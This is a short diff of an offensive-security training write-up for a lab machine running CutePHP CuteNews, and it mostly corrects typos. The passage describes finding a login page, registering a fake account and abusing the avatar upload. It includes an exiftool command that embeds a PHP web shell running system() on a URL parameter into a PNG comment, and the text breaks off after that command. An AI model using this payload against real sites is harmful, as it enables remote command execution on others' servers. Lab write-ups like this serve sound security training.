TeoGia/offsec-training/bbs_cute_1.md

 DOWNLOADED: 368960 - FOUND: 83
 ```

 There's an interesting result here: `http://192.168.1.9/index.php`.
-It's actually a login pahe with a register option!.
+It's actually a login page with a register option!
 Lets create a fake account to get access.

 Navigating around the personal options, after we create a fake account, we see that we can upload a custom avatar.
 (This is also a known vulnerability of cutePHP Cutenews.
 You can find it [here](https://www.exploit-db.com/exploits/48458)).

 Lets create a `php` payload inside a `png` image, upload it and see if we can get a shell to the system.

-First download a random png image, the embed the php payload in it with:
+First download a random png image, then embed the php payload in it with:
 ```
 $ exiftool -v -Comment='<?php echo "<pre>";
 system($_GET["cmd"]); ?>' bad.png